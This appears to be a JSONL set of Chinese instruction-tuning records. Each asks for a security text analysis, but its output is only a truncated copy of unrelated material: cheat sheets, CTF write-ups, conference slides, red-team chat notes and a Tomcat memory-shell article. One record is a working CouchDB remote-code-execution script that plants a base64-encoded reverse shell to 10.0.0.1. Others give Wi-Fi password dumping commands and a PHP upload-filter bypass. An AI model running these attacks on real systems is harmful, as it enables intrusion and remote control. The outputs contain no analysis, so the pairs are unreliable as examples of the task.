{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 字符编码 > 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 --- ## 基本原理 **数据宽度** 数学上的数字可以无限大但计算机中受硬件的制约数据是有长度限制的 4位宽度 - 0-F 8位宽度 - 00-FF 16位宽度 - 0000-FFFF 32位宽度 - 00000000-FFFFFFFF **逻辑运算** - 或(or |) 只要有一个为1就是1 - 与(and &) 两个都为1才是1 - 异或(xor ) 不一样为1 - 非(not !) 1是0 0是1 - CPU计算2+3 **真值** 真值就是所表示数的大小,一般用10进制表示 **机器数** 原码补码反码都是机器数的一种表示形式或者说都属于机器数 **原码** 原码的表示范围 - 127~-0, +0~+127, 共 256 个数字 最高位为符号位,\"0\" 表示正,\"1\" 表示负,其余位表示数值的大小 ``` X=+101011 , [X] 原 = 00101011 X=-101011 , [X] 原 = 10101011 ``` 位数不够的用 0 补全. - 小数原码的定义 ``` X=+0.1011 , [X] 原 = 0.1011 X=0.1011 [X] 原 = 1.1011 ``` **反码** 反码就是在原码的基础上,符号位不变其他位按位取反 (就是 0 变 1,1 变 0) 就可以了. ``` X=-101011 , [X] 原 = 10101011 ,[X] 反 = 11010100 ``` **补码** 反码的基础上按照正常的加法运算加 1. ``` X=-101011 , [X] 原 = 10101011 ,[X] 反 = 11010100,[X] 补 =11010101 ``` PS:0 的补码是唯一的,如果机器字长为 8 那么 [0] 补 = 00000000. 在计算机中负数以其正值的补码形式表达 **移码** 不管正负数,只要将其补码的符号位取反即可. ``` X=-101011 , [X] 原 = 10101011 ,[X] 反 = 11010100,[X] 补 = 11010101,[X] 移 = 01010101 ``` **有符号数和无符号数** 在计算机中可以区分正负的类型称为有符类型signed无正负的类型只有正值称为无符类型 当我们指定一个数量是无符号类型时那么其最高位的1或0和其它位一样用来表示该数的大小 当我们指定一个数量是无符号类型时此时最高数称为符号位为1时表示该数为负值为0时表示为正值 无符号数中所有的位都用于直接表示该值的大小有符号数中最高位用于表示正负所以当为正值时该数的最大值就会变小 无符号数 - 0~255 - 11111111 值255 - 1* 27 + 1* 26 + 1* 25 + 1* 24 + 1* 23 + 1* 22 + 1* 21 + 1* 20 有符号数 - -128~127 - 01111111 值127 - 1* 26 + 1* 25 + 1* 24 + 1* 23 + 1* 22 + 1* 21 + 1* 20 **大端存储和小端存储** - https://www.ruanyifeng.com/blog/2022/06/endianness-analysis.html 大端存储与小端存储模式主要指的是数据在计算机中存储的两种字节优先顺序 * 小端存储 : 高位字节放在高地址低位字节存放在低地址 * 大端存储 : 高位字节放在低地址低位字节存放在高地址 采用大端方式进行数据存放符合人类的正常思维而采用小端方式进行数据存放利于计算机处理 <img src=\"../../../assets/img/Develop/计算机基础/字符编码/3.webp\" width=\"40%\"> 例如要表示 0x12345678 ``` 偏移地址: 0x 00 01 02 03 大端存储: 12 34 56 78 小端存储: 78 56 34 12 ``` 如果将一个16位的整数0x1234存放到一个短整型变量short中这个短整型变量在内存中的存储在大小端模式由下表所示 ``` 偏移地址: 0x 00 01 大端存储: 12 34 小端存储: 34 12 ``` * 各自优点 * 小端存储 : 便于数据之间的类型转换例如long 类型转换为 int 类型时高地址部分的数据可以直接截掉 * 大端存储 : 便于数据类型的符号判断因为最低地址位数据即为符号位可以直接判断数据的正负号 * 用途 * 小端存储 : 常见于本地主机上(也有部分类型主机为大端存储)和 x86 平台 * 大端存储 : 常见于网络通信和 arm/移动平台上网际协议 TCP/IP 在传输整型数据时一般使用大端存储模", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Find date: 2020-12-28 16:52:20 tags: - search - file - directory categories: - Linux Command intro: | This is a quick reference list of cheatsheet for linux find command, contains common options and examples. plugins: - copyCode --- Getting Started --------------- ### Usage ```shell script $ find [path...] [options] [expression] ``` Wildcard ```shell script $ find . -name \"*.txt\" $ find . -name \"2020*.csv\" $ find . -name \"json_*\" ``` ---- - [Regex reference](/regex) _(quickref.me)_ - [Find cheatsheet](https://gist.github.com/gr1ev0us/3a9b9d9dbdd38f6379288eb2686fc538) _(gist.github.com)_ ### Option Examples {.col-span-2} | Option | Example | Description | |-------------|-------------------------------------------|---------------------------------------------| | `-type` | find . -type d | Find only directories | | `-name` | find . -type f -name \"*.txt\" | Find file by name | | `-iname` | find . -type f -iname \"hello\" | Find file by name (case-insensitive) | | `-size` | find . -size +1G | Find files larger than 1G | | `-user` | find . -type d -user jack | Find jack's file | | `-regex` | find /var -regex '.\\*/tmp/.\\*[0-9]*.file' | Using Regex with find. See [regex](/regex) | | `-maxdepth` | find . -maxdepth 1 -name \"a.txt\" | In the current directory and subdirectories | | `-mindepth` | find / -mindepth 3 -maxdepth 5 -name pass | Between sub-directory level 2 and 4 | {.show-header} ### Type | | | |-----------|----------------------| | `-type d` | Directory | | `-type f` | File | | `-type l` | Symbolic link | | `-type b` | Buffered block | | `-type c` | Unbuffered character | | `-type p` | Named pipe | | `-type s` | Socket | ### Size | | | |-----------|---------------------------| | `-size b` | 512-byte blocks (default) | | `-size c` | Bytes | | `-size k` | Kilobytes | | `-size M` | Megabytes | | `-size G` | Gigabytes | | `-size T` | Terabytes _(only BSD)_ | | `-size P` | Petabytes _(only BSD)_ | ### Size +/- Find all bigger than 10MB files ```shell script $ fin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1021-002-windows-管理员共享 ## 来自ATT&CK的描述 攻击者可以使用服务器帐户阻止SMB使用有效帐户与远程网络共享进行交互然后攻击者可以以登录用户的身份执行操作 SMB是同一网络或域上Windows计算机的文件打印机和串行端口共享协议攻击者可以使用SMB与文件共享进行交互从而允许他们在整个网络中横向移动SMB的Linux和macOS实现通常使用Samba Windows系统具有隐藏的网络共享只有管理员才能访问它们并提供了远程文件复制和其他管理功能例如网络共享包括C$ADMIN$和IPC$攻击者可以将此技术与管理员级别的有效帐户结合使用以通过SMB远程访问网络系统使用远程过程调用RPC与系统进行交互传输文件以及通过远程执行来运行传输的二进制文件依赖于SMB/RPC上经过身份验证的会话的示例执行技术为计划任务/作业服务执行和Windows管理规范攻击者还可以使用NTLM哈希访问具有散列特定配置和补丁程序级别的系统上的管理员共享 ## 测试案例 暂无 ## 检测日志 Netflow ## 测试复现 暂无 ## 测试留痕 暂无 ## 检测规则/思路 虽然可能有更多基于主机日志的方法可以检测主机上的详细SMB事件但也可以从网络流量中提取检测到它们使用正确的协议解析器可以过滤端口445流量甚至可以检索文件路径相对于共享 flow = search Flow:Message smb_events = filter flow where (dest_port == \"445\" and protocol == \"smb\") smb_events.file_name = smb_events.proto_info.file_name output smb_write 值得注意的是基于这样的检测可能会产生大量的误报 ## 参考推荐 MITRE-ATT&CK-T1021-002 <https://attack.mitre.org/techniques/T1021/002/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking WITH the iPod Touch Thomas Wilhelm a.k.a. Hacker Junkie 1 Personal Experience Penetration Tester / Project Manager Fortune 20 Company Internal and External System Network Architectures Certifications: ISSMP, CISSP, SCSECA, SCNA, SCSA, NSA-IEM, NSA-IAM 2 Personal Experience Associate Professor Colorado Technical University What I Teach: Information System Security Undergrads and Graduate Programs 3 Personal Experience Masters Degrees: Computer Science, Management (InfoSec) Doctoral Student - Capella University Information Technology Specialization: Information Assurance & Security National Center of Academic Excellence in Information Assurance Education (CAEIAE) 4 Personal Experience Author 5 Objectives Jailbreaking the iPod Touch / iPhone Using iPod Touch as PenTest Platform Hacking with the iPod Touch iPod Touch as an Attack Vector Conclusion 6 Jailbreaking Legal Issues Jailbreaking Tools 7 Jailbreaking Legal Issues EFF Proposed Exception Proposed Class #1: Computer programs that enable wireless telephone handsets to execute lawfully obtained software applications, where circumvention is accomplished for the sole purpose of enabling interoperability of such applications with computer programs on the telephone handset. - http://www.copyright.gov/1201/2008/comments/lohmann-fred.pdf 8 Jailbreaking Legal Issues DMCA Violation Apple is opposed to the proposed Class #1 exemption because it will destroy the technological protection of Apples key copyrighted computer programs in the iPhone device itself and of copyrighted content owned by Apple that plays on the iPhone, resulting in copyright infringement, potential damage to the device and other potential harmful physical effects, adverse effects on the functioning of the device, and breach of contract. - http://www.copyright.gov/1201/2008/responses/apple-inc-31.pdf 9 Jailbreaking Legal Issues Outcome? Copyright Office will be making a decision in October regarding exception Apples License Agreement still in effect,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack the hackers: Leaking data over SSL/TLS Ionut Cernica Table of contents Introduction Scenarios and Challanges Blind Injection Problem Blind Injection over SSL/TLS 01 03 02 04 Demo Time  sqlmap Conclusion 05 06 whoami Security Researcher @Future Networks 5G Lab PhD Student @Department of Computer Science CTF Player Penetration Tester Entrepreneur Former Bug Bounty Hunter Special Thanks Get free access to the best online penetration testing platform for a limited time! Sign up for a free 2 weeks trial: https://pentest-tools.com/DEFCON2021 Blind Injection - How it works?  One byte from each position of the information querying the server for True or False  Boolean  Time Based  SQL Injection (Blind SQL Injection) Problem??? We can distinguish true and false from the encrypted traffic just looking on the length of the responses or the delays between them Real Problem -> BILOST BILOST -> Blind Injection Leak Over SSL/TLS Passive attack; no interaction with the victim Blind Injection exploits are written in a PREDICTABLE way f(n) = x ---- where n is the leak f -> the method x -> 2 types of output; True or False n -> the result; or the leak! Known methods of exploiting with blind technique Charset  abcdef-z 0123-9 Binary search  sqlmap demo Bit Shifting  not so common Challenges with the extraction methods No challenges when we are dealing with optimization techniques like binary search or bit shifting Charset method was the biggest challenge. Exploit over SSL/TLS We have the length of the packets; Boolean We have the time between packets; Time based Even there is a padding involved, in some cases we still exploit this problem. Would work if the block size is smaller than the difference between True and False responses Is not a problem with the SSL/TLS protocol Scenarios of exploiting Penetration testing company ISP  Internet Service Provider Maybe, one more reason why large countries have a strategic interest to pass the traffic of another country through their infrast", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHarness: Powershell Weaponization Made Easy (or at least easier) Rich Kelley @RGKelley5 Whats this all about anyway?  Audience: Penetration testers Red Teams Powershell activists Python enthusists  Bottom line Powershell weaponization can be somewhat cumbersome Hopefully Ive made that a little easier with the Harness tool set Who is this guy?  Computer science background  Prior US Air Force Communications Officer  Network engineer, software developer, penetration tester  Currently focused on application pen testing  Mostly I enjoy writing obscure utilities pyhashcat Keyboard walk generators Why should I care?  Microsofts Post-Exploitation Language - @obsuresec  Defenders should be more aware of the damage attackers can do with Powershell alone  We need more research into incident response related to malicious Powershell use DEF CON 22 - Ryan Kazanciyan and Matt Hastings, Investigating PowerShell Attacks Powershell weaponization problem? How do you get your [Powershell] scripts running on your target machines, and effectively get your results back? - @harmj0y Hasnt this problem been solved?  Yep, but Im a developer. Why use someone elses solution when I can write my own (Im kiddingsort of)  Previous solutions were not as seamless as I wanted Step 1: Gain access Step 2: ????? Step 3: Use powershell Step 4: Pwn all things!  A couple of very cool new solutions have recently been released RDP  Copy/Paste or Import-Module Remote shell  call powershell.exe Metasploit  exec_powershell Metasploit  Interactive PS Payloads Cobalt Strike  Beacon My Development Requirements 1. Fully interactive remote Powershell console with the same capabilities as the native Powershell.exe 2. Ability to seamlessly import modules across the wire Demo Time! Under the hood  Payload Requirements .NET 3.0+ Powershell 2.0 System.Management.Automation Assembly  Tested on: Windows 7 Window 8 Windows 8.1 Windows Server 2008 R2 Windows Server 2012 Under the hood  Listener/Framework Requirements Python 3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Jit in my pants (reversing, 3 points, 38 solves) Because reversing an obfuscated jit'ed virtual machine for 3 points is fun! In this task we got an ELF binary. Looking at it's disassembly was really hard - lots of obfuscated code was put there - I thought that for 3 points we were supposed to use something easier. Tracing the binary, we notice a lot of `gettimeofday` calls. This was a function checking current time - something which should not be present in legitimate key checking code. I created a simple replacement function (`tofd.c`), which I then LD_PRELOAD'ed to achieve deterministic execution. In my solution, I used instruction counting to get the flag. The idea is, that the code checks flag characters one by one, exitting early if a character is wrong. We can exploit this - when we supply a good prefix of the flag, the binary will execute slightly longer than with a wrong one. Using `doit.py` and Intel's pin, we brute forced the solution one char at a time in around an hour (this could take shorter time, but I wanted to stay on the safer side and used `string.printable` as the character set).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVendor Name PART NUMBER DESCRIPTION QTY. Price(USD) Total Price(USD) Total Weight ABS (Grams) McMaster-Carr 4687T110 Thick-Wall Dark Gray PVC Threaded Pipe 1/4 Pipe Size X 2' Length, Threaded Ends 1 10.01 10.01 0 McMaster-Carr 8585K11 Impact-Resistant Polycarbonate Round Tube 3/8\" OD, 1/4\" ID, Clear 2 0.77 1.54 0 McMaster-Carr 97155A639 Plastic Dowel Pin 1/4\" Diameter, 3/4\" Length, Acetal 2 0.14 0.28 0 McMaster-Carr 1414T36 Syntactic Foam Buoyancy 1 20.55 20.55 0 McMaster-Carr 5236K527 High-Temperature Silicone Rubber Tubing Very Soft, 3/4\" ID, 7/8\" OD, 1/16\" Wall Thk 4 1.75 7.00 0 McMaster-Carr 98286A453 Black Nylon 100 Deg Flat Head Machine Screw Slotted, 4-40 Thread, 1\" Length 4 0.06 0.24 0 McMaster-Carr 98286A432 Black Nylon 100 Deg Flat Head Machine Screw Slotted, 4-40 Thread, 1/2\" Length 12 0.06 0.72 0 MEGABATTERIES 16915 Camelion CR2330 60 0.90 54.00 0 Sparkfun TOL-09509 30W 110V Heating Element 4 3.95 15.80 0 Mouser AQZ107_200VDC-1.3A-Load_3-5VDC_switch Mouser P/N: 769-AQZ107 Price:$9.67 Digikey P/N: 255- 2698-ND Price:$11.00 4 11.00 44.00 0 Mouser NSCSHHN015PAUNV Honeywell TruStability NSC 15Bar Absolute Analog Pressure Transducer 1 30.05 30.05 0 3D Robotics LLC 3DR_GPS_NEMA MediaTek MT3329 GPS V2.0 1 37.95 37.95 0 HobbyKing 9387000008 MultiWii MicroWii ATmega32U4 Flight Controller USB/BARO/ACC/MAG 1 33.99 33.99 0 Printed Nose_Assembly_Part_1of3 1 65.17 Printed Nose_Assembly_Part_2of3 1 10.33 Printed Nose_Assembly_Part_3of3 1 10.2 Printed Nose_Body_Assembly_1of4 1 142.03 Printed Nose_Body_Assembly_2of4 1 51.61 Printed Nose_Body_Assembly_3of4 1 18.33 Printed Nose_Body_Assembly_4of4 4 10.56 Printed Body_Assembly_Outer_Shell 1 132.9 Printed Body_Assembly_Inner_Shell_1of2 1 13.33 Printed Body_Assembly_Inner_Shell_2of2 1 95.96 Printed Body_Assembly_NACA_Wing_1_and_2 2 117.66 Printed Tail_Assembly_Part_1of1 1 14.92 Total Printed ABS(Grams) 683 Total Cost Printed Parts: (at $31.00/kg) 21.17 Total BoM: 277.30", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从FireEye的泄露看红队的差距 1. 前言 一大早被领导拉起来分析火眼事件朋友圈整个安全圈子也是沸腾不已但随着分析的深入发现有 点小题大做了没有想要的高尖精工具和技术方案全是一堆已知攻击技术的红队模拟工具但站在 一个红队人员的角度也是收获不少 2. 红队服务真的有用假想敌手段么 以假想敌手段来评估企业安全这里的手段往往被定义为APT手段国内当前的红队服务使用的手段是 APT手段么什么是APT手段红队是怎么模拟的 在火眼给的防御策略中明显看出APT开头的很多样本工具后门火眼的安全人员把各项在APT活动 中的技术方法做成了红队工具用来评估企业对各种APT技术的防御能力至少从工具层面火眼做到 了假想敌的要求而国内的红队怎么样呢大家自己体会不多说 什么是APT手段国内大部分公司把APT追踪放在威胁情报部门也出了一些分析报告从技术手段来 说所谓的APT报告可能只能叫做样本分析报告吧有没有对发现的技术进行工具化提供给红队做红 队评估大家心里有数 3. 如果火眼红队只有这样的水平也不过如此 号称全球最懂APT的火眼如果仅仅只有策略体现的水平有点名不副实了 从策略中分析有60%左右的开源项目%35左右的为开源项目二次开发%5左右为已知技术的实现 所有的技术全部为已知且公开技术没有前瞻性的技术方案没有大型的工具平台我想说我不信 4. 从策略看国外红队工程化水准 毫不客气的说是领先了国内很多的其中大部分是C#开发符合国外红队圈子的技术走向GITHUB 开源的红队工具大部分也是C#开发我读过一些工具的代码水准也是一般这可能也是火眼进行了大 量二次开发的原因吧再回头看国内武器化思路才起步谈工程化就有点打脸没有开源氛围没有 工程化能力想开源的代码能力弱了点代码能力强的敝帚自珍工具的法律风险也是一大掣肘既不 懂APT也不会写代码你给我说你是做红队的 5.作为技术人员还是要看点技术 大部分技术人员可能和我一样看能不能捞点工具回来FireEYE泄露的工具至少比开源工具稳定性要 好些可是我通过md5上VT捞结论是没有没有没有但是也给了一些不大不小的启示 1. GORat火眼竟然在用我可能需要去尝试下 2. 其中有个D语言后门多搞点小众语言减轻杀软对抗的痛苦 3. Dll劫持是不错的权限维持手段策略里面含有大量dll劫持方案但是都是公开的 4. 各种Loader的制作还是对抗的前沿 5. 还是要多造轮子已有的轮子不一定都是好轮子 6. 已知漏洞武器化还是很有必要相信大部分人和我一样眼馋的是那份CVE武器化工具潜意识认为 火眼开发的利用一定还是不错的 6. 我们的路还很长 红队的路还很长认清楚差距看明白方向最后希望火眼披露攻击细节希望看见黑客世界顶尖的样 子就目前的公开的我想说我裤子都脱了你给我看这个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n群精华总结 2021-08-26 @只要ID够长别人就不能看到我问 师傅们复现printnightmare本地提权发现了一个问题普通用户权限没法提权也就是没法加载dll 只有管理员权限才能加载dll提权到system理论上不应该是user -> system吗 @wolvez答 看看补丁是否打了dll 放能访问位置高版本系统自动补丁 解决貌似真的是月度补丁的问题8.10号偷偷更新的 @王半仙问 msf使用exploit/windows/local/persistence生成了权限维持后门在windows 2008r2中注销后注 册表在文件不见了各位大佬有遇到的么 @skrtskrt 答 复现了 https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.TerminalServe r::TS_TEMP_PER_SESSION 开了RDP 以后 所有的用户session 的tmp 目录都是 id 如果你从没用RDP 登 录不会有session id 直接到 temp 目录 https://admx.help/ 这个站可以查许多配置信息 不错 @B1ngDa0 问 可以通过这俩命令找到用户连接过的配置文件以及wifi的密码 有没什么办法或者命令知道当前是连的哪 个配置文件吗 @A. 答 netsh wlan show profiles netsh wlan show profile name=\"SSID\" key=clear Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily No. 1 / 3 - Welcome to www.red-team.cn @David 问 求问个问题php的任意文件写入 echo 111 > /root/1.php 可以 echo 失败 echo \"\"失败 过滤了 <和> 有解吗 @ShadowMccc答 @&男儿行答 echo -e \"\\x3C\" > 111.txt @Digg3r 答 echo -n 一个字符一个字符往里面追加 @David 解决了 php语法 不用<?php 用<script language=php 解决的 昨天的上传就是这样 拦截<? 也是用的这个 方法解决的 Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily No. 2 / 3 - Welcome to www.red-team.cn Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily No. 3 / 3 - Welcome to www.red-team.cn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import requests import json import base64 from requests.auth import HTTPBasicAuth target = 'http://your-ip:5984' command = rb\"\"\"sh -i >& /dev/tcp/10.0.0.1/443 0>&1\"\"\" version = 1 session = requests.session() session.headers = { 'Content-Type': 'application/json' } # session.proxies = { # 'http': 'http://127.0.0.1:8085' # } session.put(target + '/_users/org.couchdb.user:wooyun', data='''{ \"type\": \"user\", \"name\": \"wooyun\", \"roles\": [\"_admin\"], \"roles\": [], \"password\": \"wooyun\" }''') session.auth = HTTPBasicAuth('wooyun', 'wooyun') command = \"bash -c '{echo,%s}|{base64,-d}|{bash,-i}'\" % base64.b64encode(command).decode() if version == 1: session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command)) else: host = session.get(target + '/_membership').json()['all_nodes'][0] session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command)) session.put(target + '/wooyun') session.put(target + '/wooyun/test', data='{\"_id\": \"wooyuntest\"}') if version == 1: session.post(target + '/wooyun/_temp_view?limit=10', data='{\"language\":\"cmd\",\"map\":\"\"}') else: session.put(target + '/wooyun/_design/test', data='{\"_id\":\"_design/test\",\"views\":{\"wooyun\":{\"map\":\"\"} },\"language\":\"cmd\"}')", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncrontab === 提交和管理用户的需要周期性执行的任务 ## 补充说明 **crontab命令** 被用来提交和管理用户的需要周期性执行的任务与windows下的计划任务类似当安装完成操作系统后默认会安装此服务工具并且会自动启动crond进程crond进程每分钟会定期检查是否有要执行的任务如果有要执行的任务则自动执行该任务 ### 语法 ```shell crontab(选项)(参数) ``` ### 选项 ```shell -e编辑该用户的计时器设置 -l列出该用户的计时器设置 -r删除该用户的计时器设置 -u<用户名称>指定要设定计时器的用户名称 ``` ### 参数 crontab文件指定包含待执行任务的crontab文件 ### 知识扩展 Linux下的任务调度分为两类 **系统任务调度** 和 **用户任务调度**  **系统任务调度** 系统周期性所要执行的工作比如写缓存数据到硬盘日志清理等在`/etc`目录下有一个crontab文件这个就是系统任务调度的配置文件 `/etc/crontab`文件包括下面几行 ```shell SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=\"\"HOME=/ # run-parts 51 * * * * root run-parts /etc/cron.hourly 24 7 * * * root run-parts /etc/cron.daily 22 4 * * 0 root run-parts /etc/cron.weekly 42 4 1 * * root run-parts /etc/cron.monthly ``` 前四行是用来配置crond任务运行的环境变量第一行SHELL变量指定了系统要使用哪个shell这里是bash第二行PATH变量指定了系统执行命令的路径第三行MAILTO变量指定了crond的任务执行信息将通过电子邮件发送给root用户如果MAILTO变量的值为空则表示不发送任务执行信息给用户第四行的HOME变量指定了在执行命令或者脚本时使用的主目录 **用户任务调度** 用户定期要执行的工作比如用户数据备份定时邮件提醒等用户可以使用 crontab 工具来定制自己的计划任务所有用户定义的crontab文件都被保存在`/var/spool/cron`目录中其文件名与用户名一致使用者权限文件如下 ```shell /etc/cron.deny 该文件中所列用户不允许使用crontab命令 /etc/cron.allow 该文件中所列用户允许使用crontab命令 /var/spool/cron/ 所有用户crontab文件存放的目录,以用户名命名 ``` crontab文件的含义用户所建立的crontab文件中每一行都代表一项任务每行的每个字段代表一项设置它的格式共分为六个字段前五段是时间设定段第六段是要执行的命令段格式如下 ```shell minute hour day month week command 顺序分 时 日 月 周 ``` 其中 * minute 表示分钟可以是从0到59之间的任何整数 * hour表示小时可以是从0到23之间的任何整数 * day表示日期可以是从1到31之间的任何整数 * month表示月份可以是从1到12之间的任何整数 * week表示星期几可以是从0到7之间的任何整数这里的0或7代表星期日 * command要执行的命令可以是系统命令也可以是自己编写的脚本文件 在以上各个字段中还可以使用以下特殊字符 * 星号*代表所有可能的值例如month字段如果是星号则表示在满足其它字段的制约条件后每月都执行该命令操作 * 逗号,可以用逗号隔开的值指定一个列表范围例如1,2,5,7,8,9 * 中杠-可以用整数之间的中杠表示一个整数范围例如2-6表示2,3,4,5,6 * 正斜线/可以用正斜线指定时间的间隔频率例如0-23/2表示每两小时执行一次同时正斜线可以和星号一起使用例如*/10如果用在minute字段表示每十分钟执行一次 **crond服务** ```shell /sbin/service crond start # 启动服务 /sbin/service crond stop # 关闭服务 /sbin/service crond restart # 重启服务 /sbin/service crond reload # 重新载入配置 ``` 查看crontab服务状态 ```shell service crond status ``` 手动启动crontab服务 ```shell service crond start ``` 查看crontab服务是否已设", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hacker101 CTF ## 0x00 Overview [Hacker101 CTF][1] is part of HackerOne free online training program. Really a good place to apply all the pen test skills for beginners. ## 0x01 CTF | Difficulty | Name | Skills | Completion | | ---------- | ------------------------------------------------- | ------------ | ---------- | | Trivial | [A little something to get you started][2] | Web | 1 / 1 | | Easy | [Micro-CMS v1][3] | Web | 4 / 4 | | Moderate | [Micro-CMS v2][5] | Web | 3 / 3 | | Hard | [Encrypted Pastebin][12] | Web, Crypto | 1 / 4 | | Moderate | [Photo Gallery][10] | Web | 3 / 3 | | Moderate | [Cody's First Blog][8] | Web | 3 / 3 | | Easy | [Postbook][6] | Web | 7 / 7 | | Moderate | [Ticketastic: Demo Instance][9] | Web | 0 / 0 | | Moderate | [Ticketastic: Live Instance][9] | Web | 2 / 2 | | Easy | [Petshop Pro][7] | Web | 3 / 3 | | Hard | [Model E1337 - Rolling Code Lock][13] | Web, Math | 1 / 2 | | Moderate | [TempImage][4] | Web | 2 / 2 | | Easy | [H1 Thermostat][11] | Android | 2 / 2 | | Expert | [Model E1337 v2 - Hardened Rolling Code Lock][14] | Math | 0 / 1 | | Moderate | [Intentional Exercise][15] | Android | 1 / 1 | | Moderate | [Hello World!][16] | Native | 1 / 1 | | Expert | [Rend Asunder][17] | Native | 1 / 3 | | Easy | [BugDB v1][18] | Web, GraphQL | 1 / 1 | | Easy | [BugDB v2][19] | Web, GraphQL | 1 / 1 | | Moderate | [BugDB v3][20] | Web, GraphQL | 1 / 1 | | Moderate | [Oauthbreaker][21] | Android | 0 / 2 | | Moderate | [Mobile Webdev][22] | Android | 0 / 2 | | Moderate | [XSS Playground by zseano][23] | Web | 0 / 1 | | Moderate | [OSU CTF][24] | Web | 0 / 1 | | Moderate | [Grayhatcon CTF][25] | Web | 0 / 4 | | Moderate | [RTFM][26] | Web | 0 / 8 | | Moderate | [Hackyholidays CTF][27] | Web | 0 / 12 | | Moderate | [Y2FuIHlvdSByZWNvbj8/][28] | Web, Recon | 0 / 3 | [1]: https://ctf.hacker101.com/ [2]: ./a_little_something_to_get_you_started [3]: ./micro-cms_v1 [4]: ./tempimage [5]: ./micro-cms_v2 [6]: ./postbook [7]: ./petshop_pro [8]: ./codys_first_b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napk-message 0x00 appandroidmessage 0x01 message message messagedemo appA Bandroid 1. message Message message= new Message() Message message= Message.obtain() Messager message= handler.obtaionMessager() obtain 2. Message message = Message.obtain(); // message.what = 0; //whatmessage code message.arg1 = 1; //int message.arg2 = 2; //int message.obj = \"aaaaa\"; // //bundlek-vbundlemap Bundle bundle = new Bundle(); bundle.putString(\"name\",\"\"); message.setData(bundle); 3. handler handler //handlerhandleMessage private Handler handler = new Handler(){ @Override public void handleMessage(Message msg){ super.handleMessage(msg); int msgcode = msg.what;//code int arg1 = msg.arg1; // int arg2 = msg.arg2; String resultMsg = (String)msg.obj; //string Bundle bundle = msg.getData();//bundle String name = bundle.getString(\"name\"); } } 4. 1. messagehandlermsg.sendToTarget()handler 2. messagehandler.sendMessage(msg)handler Ahandlermsgmsg BBmsgsendToTargetAhandler demomainhandlersetHandler handlermsgmsgsendMessage 0x02 app apk //apkclasses.dex d2j-dex2jar.sh classes.dex //jarjd-guijar urlclass setProperty xxx_url setPropertygetPropertyxxxUrl ThreadMessage 0x03 handler threadMessage3handlerparamMessageobj sendRequestthreadMessage3objmDataurl sendRequest post bodyurlrequestWithURL makeHttpConn 0x03 PUTmsgmDatamData mDatathreadMessage 1. sendToTargethandler 2. case 5 msg.what5threadMessage 3. paramh.e()utf8byte 1. paramh.e() 2. xxxxResponse e xmlbodyplistplist body makeBaseResponse plist 0x04 plistjsonplist body 1. PUTurl 2. header 3. bodyplist 0x05 messagefrida", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nServlet内存马 分类 filter 内存马是 servlet-api 内存马下的一种也是通过接口方法动态注册 tomcat 组件 直接查看 org.apache.catalina.core.ApplicationContext#addServlet 源代码 private ServletRegistration.Dynamic addServlet(String servletName, String servletClass, Servlet servlet, Map<String,String> initParams) throws IllegalStateException { if (servletName == null || servletName.equals(\"\")) { //判断servlet名称不能 为空 throw new IllegalArgumentException(sm.getString( \"applicationContext.invalidServletName\", servletName)); } if (!context.getState().equals(LifecycleState.STARTING_PREP)) { //判断程 序应用状态 //TODO Spec breaking enhancement to ignore this restriction throw new IllegalStateException( sm.getString(\"applicationContext.addServlet.ise\", getContextPath())); } Wrapper wrapper = (Wrapper) context.findChild(servletName); //从child中寻 找servlet并转换为wrapper // Assume a 'complete' ServletRegistration is one that has a class and // a name if (wrapper == null) { //如果wrapper空则手动创建wrapper wrapper = context.createWrapper(); wrapper.setName(servletName); context.addChild(wrapper); //将servlet加入到child里面 } else { if (wrapper.getName() != null && wrapper.getServletClass() != null) { if (wrapper.isOverridable()) { wrapper.setOverridable(false); } else { return null; } } } ServletSecurity annotation = null; if (servlet == null) { //设置servlet类 wrapper.setServletClass(servletClass); Class<?> clazz = Introspection.loadClass(context, servletClass); if (clazz != null) { annotation = clazz.getAnnotation(ServletSecurity.class); } 通过上面的代码已经能够知道 addServlet 方法的基本工作流程了之后我们可以模拟该过程用于 注入一个自定义的 servlet 之后还要解决的一个问题就是 servlet 的路由问题 关于 servlet 的路由问题需要回到 tomcat 源码中关于 servlet 的 mapping 信息的初始化在 tomcat 启动过程中就已经完成了之后访问 servlet 的过程中是从已有的 mappingdata 中获取 路由相关信息进行处理 而在初始话的过程中这个过程位于 